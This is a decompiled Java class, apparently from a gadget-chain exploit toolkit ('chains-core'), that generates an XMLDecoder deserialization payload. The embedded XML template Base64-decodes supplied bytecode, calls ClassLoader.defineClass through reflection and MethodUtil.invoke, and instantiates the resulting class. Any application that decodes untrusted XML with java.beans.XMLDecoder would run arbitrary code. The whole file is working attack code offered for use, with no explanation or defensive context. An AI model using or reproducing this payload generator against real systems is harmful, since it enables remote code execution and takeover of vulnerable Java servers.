package com.ar3h.chains.gadget.impl.xml;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import org.apache.commons.codec.binary.Base64;

@GadgetAnnotation(name = "ClassLoader defineClass 加载字节码", dependencies = {"jdk"})
@GadgetTags(tags = {Tag.XMLDecoderPayload}, nextTags = {Tag.BytecodeConvertTag})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/xml/XMLJdkDefineClass.class */
public class XMLJdkDefineClass implements Gadget {
    public static String template = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<java>\n    <object class=\"com.sun.org.apache.xml.internal.security.utils.Base64\" method=\"decode\" id=\"byteCode\">\n        <string><![CDATA[%s]]></string>\n    </object>\n    <void class=\"java.lang.reflect.Array\" method=\"getLength\" id=\"byteCodeLength\">\n        <object idref=\"byteCode\"></object>\n    </void>\n    <object class=\"java.lang.Thread\" method=\"currentThread\">\n        <void method=\"getContextClassLoader\" id=\"loader\"></void>\n    </object>\n    <class id=\"byteClass\">[B</class>\n    <class id=\"classLoaderClazz\">java.lang.ClassLoader</class>\n    <void idref=\"classLoaderClazz\">\n        <void method=\"getDeclaredMethod\" id=\"defineClass\">\n            <string>defineClass</string>\n            <array class=\"java.lang.Class\" length=\"3\">\n                <void index=\"0\">\n                    <class>[B</class>\n                </void>\n                <void index=\"1\">\n                    <class>int</class>\n                </void>\n                <void index=\"2\">\n                    <class>int</class>\n                </void>\n            </array>\n        </void>\n    </void>\n    <void idref=\"defineClass\">\n        <void method=\"setAccessible\">\n            <boolean>true</boolean>\n        </void>\n    </void>\n    <object method=\"invoke\" class=\"sun.reflect.misc.MethodUtil\" id=\"class\">\n        <object idref=\"defineClass\"></object>\n        <object idref=\"loader\"></object>\n        <array class=\"java.lang.Object\" length=\"3\">\n            <void index=\"0\">\n                <object idref=\"byteCode\"></object>\n            </void>\n            <void index=\"1\">\n                <int>0</int>\n            </void>\n            <void index=\"2\">\n                <object idref=\"byteCodeLength\"></object>\n            </void>\n        </array>\n    </object>\n    <void idref=\"class\">\n        <void method=\"newInstance\"></void>\n    </void>\n</java>";

    public String getObject(byte[] bArr) {
        return String.format(template, Base64.encodeBase64String(bArr));
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        return getObject((byte[]) gadgetChain.doCreate(gadgetContext));
    }
}
